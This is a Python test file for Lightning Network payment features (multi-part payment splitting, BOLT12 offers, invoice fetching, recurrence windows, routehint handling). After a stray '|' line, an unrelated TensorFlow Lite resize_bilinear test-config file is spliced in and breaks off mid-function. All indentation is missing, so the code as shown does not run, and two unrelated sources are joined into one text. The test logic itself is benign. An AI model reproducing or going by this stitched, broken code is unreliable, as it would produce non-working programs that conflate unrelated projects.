@unittest.skipIf(env('COMPAT') != 1, "legacypay requires COMPAT=1")
def test_listpays_ongoing_attempt(node_factory, bitcoind, executor):
"""Test to reproduce issue #3915.
The issue is that the bolt11 string is not initialized if the root payment
was split (no attempt with the bolt11 annotation ever hit `lightningd`,
hence we cannot filter by that. In addition keysends never have a bolt11
string, so we need to switch to payment_hash comparisons anyway.
"""
plugin = os.path.join(os.path.dirname(__file__), 'plugins', 'hold_htlcs.py')
l1, l2, l3 = node_factory.line_graph(3, opts=[{}, {}, {'plugin': plugin}],
wait_for_announce=True)
f = executor.submit(l1.rpc.keysend, l3.info['id'], 100)
l3.daemon.wait_for_log(r'Holding onto an incoming htlc')
l1.rpc.listpays()
f.result()
inv = l2.rpc.invoice(10**6, 'legacy', 'desc')['bolt11']
l1.rpc.legacypay(inv)
l1.rpc.listpays()
# Produce loads of parts to increase probability of hitting the issue,
# should result in 100 splits at least
inv = l3.rpc.invoice(10**9, 'mpp invoice', 'desc')['bolt11']
# Start the payment, it'll get stuck for 10 seconds at l3
executor.submit(l1.rpc.pay, inv)
l1.daemon.wait_for_log(r'Split into [0-9]+ sub-payments due to initial size')
l3.daemon.wait_for_log(r'Holding onto an incoming htlc')
# While that is going on, check in with `listpays` to see if aggregation
# is working.
l1.rpc.listpays()
# Now restart and see if we still can aggregate things correctly.
l1.restart()
l1.rpc.listpays()
@pytest.mark.developer("needs use_shadow")
def test_mpp_waitblockheight_routehint_conflict(node_factory, bitcoind, executor):
'''
We have a bug where a blockheight disagreement between us and
the receiver causes us to advance through the routehints a bit
too aggressively.
'''
l1, l2, l3 = node_factory.get_nodes(3)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1l2, _ = l1.fundchannel(l2, 10**7, announce_channel=True)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l3, 10**7, announce_channel=False)
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# Wait for l3 to learn about l1->l2, otherwise it will think
# l2 is a deadend and not add it to the routehint.
wait_for(lambda: len(l3.rpc.listchannels(l1l2)['channels']) >= 2)
# Now make the l1 payer stop receiving blocks.
def no_more_blocks(req):
return {"result": None,
"error": {"code": -8, "message": "Block height out of range"}, "id": req['id']}
l1.daemon.rpcproxy.mock_rpc('getblockhash', no_more_blocks)
# Increase blockheight by 2, like in test_blockheight_disagreement.
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l3])
inv = l3.rpc.invoice(Millisatoshi(2 * 10000 * 1000), 'i', 'i', exposeprivatechannels=True)['bolt11']
# Have l1 pay l3
def pay(l1, inv):
l1.rpc.dev_pay(inv, use_shadow=False)
fut = executor.submit(pay, l1, inv)
# Make sure l1 sends out the HTLC.
l1.daemon.wait_for_logs([r'NEW:: HTLC LOCAL'])
# Unblock l1 from new blocks.
l1.daemon.rpcproxy.mock_rpc('getblockhash', None)
# pay command should complete without error
fut.result(TIMEOUT)
@pytest.mark.developer("channel setup very slow (~10 minutes) if not DEVELOPER")
@pytest.mark.slow_test
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
@unittest.skipIf(True, "Temporarily disabled while flake diagnosed: blame Rusty!")
def test_mpp_interference_2(node_factory, bitcoind, executor):
'''
We create a "public network" that looks like so.
Each channel is perfectly balanced, with 7 * unit
funds on each side.
4 -- 5
| /|
| / |
| / |
|/ |
6 -- 7
l1 is the payee, who will later issue some invoices.
It arranges unpublished channels from the above public
network:
l5->l1: 7 * unit
l6->l1: 5 * unit
l4->l1: 3 * unit
l7->l1: 2 * unit
l2 and l3 are payers.
They create some unpublished channels to the public network:
l2->l4, l2->l6: 6 * unit each
l3->l7, l3->l6: 6 * unit each
Finally, l1 issues 6 * unit invoices, simultaneously, to l2 and l3.
Both of them perform `pay` simultaneously, in order to test if
they interfere with each other.
This test then tries to check if both of them can pay, given
that there is sufficient incoming capacity, and then some,
to the payee, and the public network is perfectly balanced
with more than sufficient capacity, as well.
'''
opts = {'feerates': (1000, 1000, 1000, 1000)}
l1, l2, l3, l4, l5, l6, l7 = node_factory.get_nodes(7, opts=opts)
# Unit
unit = Millisatoshi(11000 * 1000)
# Build the public network.
public_network = [l4.fundbalancedchannel(l5, unit * 14),
l4.fundbalancedchannel(l6, unit * 14),
l5.fundbalancedchannel(l6, unit * 14),
l5.fundbalancedchannel(l7, unit * 14),
l6.fundbalancedchannel(l7, unit * 14)]
# Build unpublished channels to the merchant l1.
l4.rpc.connect(l1.info['id'], 'localhost', l1.port)
l5.rpc.connect(l1.info['id'], 'localhost', l1.port)
l6.rpc.connect(l1.info['id'], 'localhost', l1.port)
l7.rpc.connect(l1.info['id'], 'localhost', l1.port)
# If we're 'dual-funding', turn off the reciprocal funding
# so that we can fund channels without making them balanced
if EXPERIMENTAL_DUAL_FUND:
for n in [l1, l2, l3, l4, l5, l6, l7]:
n.rpc.call('funderupdate', {'fund_probability': 0})
# The order in which the routes are built should not matter so
# shuffle them.
incoming_builders = [lambda: l5.fundchannel(l1, int((unit * 7).to_satoshi()), announce_channel=False),
lambda: l6.fundchannel(l1, int((unit * 5).to_satoshi()), announce_channel=False),
lambda: l4.fundchannel(l1, int((unit * 3).to_satoshi()), announce_channel=False),
lambda: l7.fundchannel(l1, int((unit * 2).to_satoshi()), announce_channel=False)]
random.shuffle(incoming_builders)
for b in incoming_builders:
b()
# Build unpublished channels from the buyers l2 and l3.
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
l2.rpc.connect(l6.info['id'], 'localhost', l6.port)
l3.rpc.connect(l7.info['id'], 'localhost', l7.port)
l3.rpc.connect(l6.info['id'], 'localhost', l6.port)
l2.fundchannel(l4, int((unit * 6).to_satoshi()), announce_channel=False)
l2.fundchannel(l6, int((unit * 6).to_satoshi()), announce_channel=False)
l3.fundchannel(l7, int((unit * 6).to_satoshi()), announce_channel=False)
l3.fundchannel(l6, int((unit * 6).to_satoshi()), announce_channel=False)
# Now wait for the buyers to learn the entire public network.
bitcoind.generate_block(5)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5, l6, l7])
for channel in public_network:
wait_for(lambda: len(l2.rpc.listchannels(channel)['channels']) == 2)
wait_for(lambda: len(l3.rpc.listchannels(channel)['channels']) == 2)
# At this point, we have the following incoming channel capacities:
# 74094000, 52314000, 30318000, 19318000
# We *always* rotate through, since we have no published channels,
# but we can select badly and get an overlap. e.g. first invoice
# takes 30318000, 19318000 and 74094000. Second will then take
# 52314000, and have to reuse 30318000, which gets exhausted by the
# first payer, thus leaving them unable to pay 66000000.
# So we re-do this until we only have 4 or fewer routehints.
while True:
# Buyers check out some purchaseable stuff from the merchant.
i2 = l1.rpc.invoice(unit * 6, ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)), 'i2')['bolt11']
i3 = l1.rpc.invoice(unit * 6, ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20)), 'i3')['bolt11']
if len(l1.rpc.decodepay(i2)['routes'] + l1.rpc.decodepay(i3)['routes']) <= 4:
break
# Pay simultaneously!
p2 = executor.submit(l2.rpc.pay, i2)
p3 = executor.submit(l3.rpc.pay, i3)
# Both payments should succeed.
p2.result(TIMEOUT)
p3.result(TIMEOUT)
def test_large_mpp_presplit(node_factory):
"""Make sure that ludicrous amounts don't saturate channels
We aim to have at most PRESPLIT_MAX_SPLITS HTLCs created directly from the
`presplit` modifier. The modifier will scale up its target size to
guarantee this, while still bucketizing payments that are in the following
range:
```
target_size = PRESPLIT_MAX_SPLITS^{n} + MPP_TARGET_SIZE
target_size < amount <= target_size * PRESPLIT_MAX_SPLITS
```
"""
PRESPLIT_MAX_SPLITS = 16
MPP_TARGET_SIZE = 10 ** 7
amt = 400 * MPP_TARGET_SIZE
l1, l2, l3 = node_factory.line_graph(
3, fundamount=10**8, wait_for_announce=True,
opts={'wumbo': None}
)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')['bolt11']
p = l1.rpc.pay(inv)
assert(p['parts'] <= PRESPLIT_MAX_SPLITS)
inv = l3.rpc.listinvoices()['invoices'][0]
assert(inv['msatoshi'] == inv['msatoshi_received'])
@pytest.mark.developer("builds large network, which is slow if not DEVELOPER")
@pytest.mark.slow_test
def test_mpp_overload_payee(node_factory, bitcoind):
"""
We had a bug where if the payer is unusually well-connected compared
to the payee, the payee is unable to accept a large payment since the
payer will split it into lots of tiny payments, which would choke the
max-concurrent-htlcs limit of the payee.
"""
# Default value as of this writing.
# However, with anchor commitments we might be able to safely lift this
# default limit in the future, so explicitly put this value here, since
# that is what our test assumes.
opts = {'max-concurrent-htlcs': 30}
l1, l2, l3, l4, l5, l6 = node_factory.get_nodes(6, opts=opts)
# Respect wumbo.
# Using max-sized channels shows that the issue is not capacity
# but rather max-concurrent-htlcs.
# This is grade-school level.
amt = 2**24 - 1
# Build the public network.
# l1 is the very well-connected payer.
# l2 is the poorly-connected payee.
# l3->l6 are well-connected hop nodes.
public_network = [l1.fundbalancedchannel(l3, amt),
l1.fundbalancedchannel(l4, amt),
l1.fundbalancedchannel(l5, amt),
l1.fundbalancedchannel(l6, amt),
l2.fundbalancedchannel(l6, amt),
l3.fundbalancedchannel(l4, amt),
l3.fundbalancedchannel(l5, amt),
l3.fundbalancedchannel(l6, amt),
l4.fundbalancedchannel(l5, amt),
l5.fundbalancedchannel(l6, amt)]
# Ensure l1 knows the entire public network.
bitcoind.generate_block(5)
sync_blockheight(bitcoind, [l1, l2, l3, l4, l5, l6])
for c in public_network:
wait_for(lambda: len(l1.rpc.listchannels(c)['channels']) >= 2)
# Now create a 400,000-sat invoice.
# This assumes the MPP presplitter strongly prefers to
# create lot sizes of 10,000 sats each.
# This leads the presplitter to prefer to split into
# around 40 HTLCs of 10,000 sats each, but since
# max-concurrent-htlcs is set to 30, l2 would be unable
# to receive.
inv = l2.rpc.invoice(Millisatoshi(400000 * 1000), 'i', 'i')['bolt11']
# pay.
l1.rpc.pay(inv)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "this is always on with EXPERIMENTAL_FEATURES")
def test_offer_needs_option(node_factory):
"""Make sure we don't make offers without offer command"""
l1 = node_factory.get_node()
with pytest.raises(RpcError, match='Unknown command'):
l1.rpc.call('offer', {'amount': '1msat', 'description': 'test'})
with pytest.raises(RpcError, match='Unknown command'):
l1.rpc.call('fetchinvoice', {'offer': 'aaaa'})
def test_offer(node_factory, bitcoind):
plugin = os.path.join(os.path.dirname(__file__), 'plugins/currencyUSDAUD5000.py')
l1 = node_factory.get_node(options={'plugin': plugin, 'experimental-offers': None})
bolt12tool = os.path.join(os.path.dirname(__file__), "..", "devtools", "bolt12-cli")
# Try different amount strings
for amount in ['1msat', '0.1btc', 'any', '1USD', '1.10AUD']:
ret = l1.rpc.call('offer', {'amount': amount,
'description': 'test for ' + amount})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
assert offer['bolt12'] == ret['bolt12']
assert offer['offer_id'] == ret['offer_id']
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('ASCII')
if amount == 'any':
assert 'amount' not in output
else:
assert 'amount' in output
# Try wrong amount precision:
with pytest.raises(RpcError, match='Currency AUD requires 2 minor units'):
l1.rpc.call('offer', {'amount': '1.100AUD',
'description': 'test for invalid amount'})
with pytest.raises(RpcError, match='Currency AUD requires 2 minor units'):
l1.rpc.call('offer', {'amount': '1.1AUD',
'description': 'test for invalid amount'})
# Make sure it fails on unknown currencies.
with pytest.raises(RpcError, match='No values available for currency EUR'):
l1.rpc.call('offer', {'amount': '1.00EUR',
'description': 'test for unknown currency'})
# Test label and description
weird_label = 'label \\ " \t \n'
weird_desc = 'description \\ " \t \n ナンセンス 1杯'
ret = l1.rpc.call('offer', {'amount': '0.1btc',
'description': weird_desc,
'label': weird_label})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
assert offer['label'] == weird_label
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'description: ' + weird_desc in output
# Test vendor
weird_vendor = 'description \\ " \t \n ナンセンス 1杯'
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'vendor test',
'vendor': weird_vendor})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'vendor: ' + weird_vendor in output
# Test quantity min/max
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_min test',
'quantity_min': 1})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'quantity_min: 1' in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'quantity_max': 2})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'quantity_max: 2' in output
# Test absolute_expiry
exp = int(time.time() + 2)
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'absolute_expiry': exp})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'absolute_expiry: {}'.format(exp) in output
# Recurrence tests!
for r in [['1second', 'seconds', 1],
['10seconds', 'seconds', 10],
['1minute', 'seconds', 60],
['10minutes', 'seconds', 600],
['1hour', 'seconds', 3600],
['10hours', 'seconds', 36000],
['1day', 'days', 1],
['10days', 'days', 10],
['1week', 'days', 7],
['10weeks', 'days', 70],
['1month', 'months', 1],
['10months', 'months', 10],
['1year', 'years', 1],
['10years', 'years', 10]]:
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': r[0]})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every {} {}\n'.format(r[2], r[1]) in output
# Test limit
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_limit': 5})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds limit 5\n' in output
# Test base
# (1456740000 == 10:00:00 (am) UTC on 29 February, 2016)
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_base': '@1456740000'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds start 1456740000' in output
assert '(can start any period)' not in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_base': 1456740000})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds start 1456740000' in output
assert '(can start any period)' in output
# Test paywindow
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_paywindow': '-10+20'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds paywindow -10 to +20\n' in output
ret = l1.rpc.call('offer', {'amount': '100000sat',
'description': 'quantity_max test',
'recurrence': '10minutes',
'recurrence_paywindow': '-10+600%'})
offer = only_one(l1.rpc.call('listoffers', [ret['offer_id']])['offers'])
output = subprocess.check_output([bolt12tool, 'decode',
offer['bolt12']]).decode('UTF-8')
assert 'recurrence: every 600 seconds paywindow -10 to +600 (pay proportional)\n' in output
def test_fetchinvoice(node_factory, bitcoind):
# We remove the conversion plugin on l3, causing it to get upset.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{'experimental-offers': None},
{'experimental-offers': None},
{'experimental-offers': None,
'allow_broken_log': True}])
# Simple offer first.
offer1 = l3.rpc.call('offer', {'amount': '2msat',
'description': 'simple test'})
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12']})
inv2 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12']})
assert inv1 != inv2
assert 'next_period' not in inv1
assert 'next_period' not in inv2
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is False
l1.rpc.pay(inv1['invoice'])
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is True
l1.rpc.pay(inv2['invoice'])
assert only_one(l3.rpc.call('listoffers', [offer1['offer_id']])['offers'])['used'] is True
# We can also set the amount explicitly, to tip.
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 3})
assert l1.rpc.call('decode', [inv1['invoice']])['amount_msat'] == 3
l1.rpc.pay(inv1['invoice'])
# More than ~5x expected is rejected as absurd (it's actually a divide test,
# which means we need 15 here, not 11).
with pytest.raises(RpcError, match="Remote node sent failure message.*Amount vastly exceeds 2msat"):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 15})
# Underpay is rejected.
with pytest.raises(RpcError, match="Remote node sent failure message.*Amount must be at least 2msat"):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'msatoshi': 1})
# Single-use invoice can be fetched multiple times, only paid once.
offer2 = l3.rpc.call('offer', {'amount': '1msat',
'description': 'single-use test',
'single_use': True})['bolt12']
inv1 = l1.rpc.call('fetchinvoice', {'offer': offer2})
inv2 = l1.rpc.call('fetchinvoice', {'offer': offer2})
assert inv1 != inv2
assert 'next_period' not in inv1
assert 'next_period' not in inv2
l1.rpc.pay(inv1['invoice'])
# We can't pay the other one now.
with pytest.raises(RpcError, match="INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_node': '{}'".format(l3.info['id'])):
l1.rpc.pay(inv2['invoice'])
# We can't reuse the offer, either.
with pytest.raises(RpcError, match='Offer no longer available'):
l1.rpc.call('fetchinvoice', {'offer': offer2})
# Recurring offer.
offer3 = l2.rpc.call('offer', {'amount': '1msat',
'description': 'recurring test',
'recurrence': '1minutes'})
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is False
ret = l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 0,
'recurrence_label': 'test recurrence'})
period1 = ret['next_period']
assert period1['counter'] == 1
assert period1['endtime'] == period1['starttime'] + 59
assert period1['paywindow_start'] == period1['starttime'] - 60
assert period1['paywindow_end'] == period1['endtime']
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is False
l1.rpc.pay(ret['invoice'], label='test recurrence')
assert only_one(l2.rpc.call('listoffers', [offer3['offer_id']])['offers'])['used'] is True
ret = l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 1,
'recurrence_label': 'test recurrence'})
period2 = ret['next_period']
assert period2['counter'] == 2
assert period2['starttime'] == period1['endtime'] + 1
assert period2['endtime'] == period2['starttime'] + 59
assert period2['paywindow_start'] == period2['starttime'] - 60
assert period2['paywindow_end'] == period2['endtime']
# Can't request 2 before paying 1.
with pytest.raises(RpcError, match='previous invoice has not been paid'):
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
l1.rpc.pay(ret['invoice'], label='test recurrence')
# Now we can, but it's too early:
with pytest.raises(RpcError, match="Too early: can't send until time {}".format(period1['starttime'])):
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
# Wait until the correct moment.
while time.time() < period1['starttime']:
time.sleep(1)
l1.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 2,
'recurrence_label': 'test recurrence'})
# Check we can request invoice without a channel.
l4 = node_factory.get_node(options={'experimental-offers': None})
l4.rpc.connect(l2.info['id'], 'localhost', l2.port)
ret = l4.rpc.call('fetchinvoice', {'offer': offer3['bolt12'],
'recurrence_counter': 0,
'recurrence_label': 'test nochannel'})
# Now, test amount in different currency!
plugin = os.path.join(os.path.dirname(__file__), 'plugins/currencyUSDAUD5000.py')
l3.rpc.plugin_start(plugin)
offerusd = l3.rpc.call('offer', {'amount': '10.05USD',
'description': 'USD test'})['bolt12']
inv = l1.rpc.call('fetchinvoice', {'offer': offerusd})
assert inv['changes']['msat'] == Millisatoshi(int(10.05 * 5000))
# If we remove plugin, it can no longer give us an invoice.
l3.rpc.plugin_stop(plugin)
with pytest.raises(RpcError, match="Internal error"):
l1.rpc.call('fetchinvoice', {'offer': offerusd})
l3.daemon.wait_for_log("Unknown command 'currencyconvert'")
# But we can still pay the (already-converted) invoice.
l1.rpc.pay(inv['invoice'])
# Test timeout.
l3.stop()
with pytest.raises(RpcError, match='Timeout waiting for response'):
l1.rpc.call('fetchinvoice', {'offer': offer1['bolt12'], 'timeout': 10})
# Now try an offer with a more complex paywindow (only 10 seconds before)
offer = l2.rpc.call('offer', {'amount': '1msat',
'description': 'paywindow test',
'recurrence': '20seconds',
'recurrence_paywindow': '-10+0'})['bolt12']
ret = l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 0,
'recurrence_label': 'test paywindow'})
period3 = ret['next_period']
assert period3['counter'] == 1
assert period3['endtime'] == period3['starttime'] + 19
assert period3['paywindow_start'] == period3['starttime'] - 10
assert period3['paywindow_end'] == period3['starttime']
l1.rpc.pay(ret['invoice'], label='test paywindow')
# We can get another invoice, as many times as we want.
# (It may return the same one!).
while int(time.time()) <= period3['paywindow_start']:
time.sleep(1)
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
# Wait until too late!
while int(time.time()) <= period3['paywindow_end']:
time.sleep(1)
with pytest.raises(RpcError, match="Too late: expired time {}".format(period3['paywindow_end'])):
l1.rpc.call('fetchinvoice', {'offer': offer,
'recurrence_counter': 1,
'recurrence_label': 'test paywindow'})
def test_pay_waitblockheight_timeout(node_factory, bitcoind):
plugin = os.path.join(os.path.dirname(__file__), 'plugins', 'endlesswaitblockheight.py')
l1, l2 = node_factory.line_graph(2, opts=[{}, {'plugin': plugin}])
sync_blockheight(bitcoind, [l1, l2])
inv = l2.rpc.invoice(42, 'lbl', 'desc')['bolt11']
with pytest.raises(RpcError, match=r'WIRE_INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
l1.rpc.pay(inv)
# Post mortem checks that we tried only once.
status = l1.rpc.paystatus(inv)
# Should have only one attempt that triggered the wait, which then failed.
assert len(status['pay']) == 1
assert len(status['pay'][0]['attempts']) == 1
def test_sendinvoice(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, wait_for_announce=True,
opts={'experimental-offers': None})
# Simple offer to send money (balances channel a little)
offer = l1.rpc.call('offerout', {'amount': '100000sat',
'description': 'simple test'})
# Fetchinvoice will refuse, since you're supposed to send an invoice.
with pytest.raises(RpcError, match='Offer wants an invoice, not invoice_request'):
l2.rpc.call('fetchinvoice', {'offer': offer['bolt12']})
# used will be false
assert only_one(l1.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is False
# sendinvoice should work.
out = l2.rpc.call('sendinvoice', {'offer': offer['bolt12'],
'label': 'test sendinvoice 1'})
print(out)
assert out['label'] == 'test sendinvoice 1'
assert out['description'] == 'simple test'
assert 'bolt12' in out
assert 'payment_hash' in out
assert out['status'] == 'paid'
assert 'payment_preimage' in out
assert 'expires_at' in out
assert out['msatoshi'] == 100000000
assert out['amount_msat'] == Millisatoshi(100000000)
assert 'pay_index' in out
assert out['msatoshi_received'] == 100000000
assert out['amount_received_msat'] == Millisatoshi(100000000)
# Note, if we're slow, this fails with "Offer no longer available",
# *but* if it hasn't heard about payment success yet, l2 will fail
# simply because payments are already pending.
with pytest.raises(RpcError, match='Offer no longer available|pay attempt failed'):
l2.rpc.call('sendinvoice', {'offer': offer['bolt12'],
'label': 'test sendinvoice 2'})
# Technically, l1 may not have gotten payment success, so we need to wait.
wait_for(lambda: only_one(l1.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is True)
# Now try a refund.
offer = l2.rpc.call('offer', {'amount': '100msat',
'description': 'simple test'})
assert only_one(l2.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is False
inv = l1.rpc.call('fetchinvoice', {'offer': offer['bolt12']})
l1.rpc.pay(inv['invoice'])
assert only_one(l2.rpc.call('listoffers', [offer['offer_id']])['offers'])['used'] is True
refund = l2.rpc.call('offerout', {'amount': '100msat',
'description': 'refund test',
'refund_for': inv['invoice']})
assert only_one(l2.rpc.call('listoffers', [refund['offer_id']])['offers'])['used'] is False
l1.rpc.call('sendinvoice', {'offer': refund['bolt12'],
'label': 'test sendinvoice refund'})
wait_for(lambda: only_one(l2.rpc.call('listoffers', [refund['offer_id']])['offers'])['used'] is True)
def test_self_pay(node_factory):
"""Repro test for issue 4345: pay ourselves via the pay plugin.
"""
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
inv = l1.rpc.invoice(10000, 'test', 'test')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(inv)
@unittest.skipIf(TEST_NETWORK != 'regtest', "Canned invoice is network specific")
def test_unreachable_routehint(node_factory, bitcoind):
"""Test that we discard routehints that we can't reach.
Reachability is tested by checking whether we can reach the
entrypoint of the routehint, i.e., the first node in the
routehint. The network we create is partitioned on purpose for
this: first we attempt with an unknown destination and an unknown
routehint entrypoint, later we make them known, but still
unreachable, by connecting them without a channel.
"""
# Create a partitioned network, first without connecting it, then
# connecting it without a channel so they can sync gossip. Notice
# that l4 is there only to trick the deadend heuristic.
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
l3, l4, l5 = node_factory.line_graph(3, wait_for_announce=True)
entrypoint = '0382ce59ebf18be7d84677c2e35f23294b9992ceca95491fcf8a56c6cb2d9de199'
# Generate an invoice with exactly one routehint.
for i in range(100):
invoice = l5.rpc.invoice(10, 'attempt{}'.format(i), 'description')['bolt11']
decoded = l1.rpc.decodepay(invoice)
if 'routes' in decoded and len(decoded['routes']) == 1:
break
assert('routes' in decoded and len(decoded['routes']) == 1)
with pytest.raises(RpcError, match=r'Destination [a-f0-9]{66} is not reachable'):
l1.rpc.pay(invoice)
l1.daemon.wait_for_log(
r"Removed routehint 0 because entrypoint {entrypoint} is unknown.".format(
entrypoint=entrypoint
)
)
# Now connect l2 to l3 to create a bridge, but without a
# channel. The entrypoint will become known, but still
# unreachable, resulting in a slightly different error message,
# but the routehint will still be removed.
l2.connect(l3)
wait_for(lambda: len(l1.rpc.listnodes(entrypoint)['nodes']) == 1)
with pytest.raises(RpcError, match=r'Destination [a-f0-9]{66} is not reachable') as excinfo:
l1.rpc.pay(invoice)
# Verify that we failed for the correct reason.
l1.daemon.wait_for_log(
r"Removed routehint 0 because entrypoint {entrypoint} is unreachable.".format(
entrypoint=entrypoint
)
)
# Since we aborted once we realized the destination is unreachable
# both directly, and via the routehints we should now just have a
# single attempt.
assert(len(excinfo.value.error['attempts']) == 1)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for resize_bilinear."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [False]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [True]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 16, 24, 3], [1, 12, 18, 3]],
"size": [[8, 12], [12, 18]],
"align_corners": [None, True, False],
"half_pixel_centers": [False],
"fully_quantize": [True]
}, {
"dtype": [tf.float32],
"input_shape": [[1, 16, 24, 3], [1, 12, 18, 3]],
"size": [[8, 12]],
"align_corners": [None, False],
"half_pixel_centers": [True],
"fully_quantize": [True]
}, {
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, False],
"half_pixel_centers": [True],
"fully_quantize": [False]
}]
def build_graph(parameters):
input_tensor = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
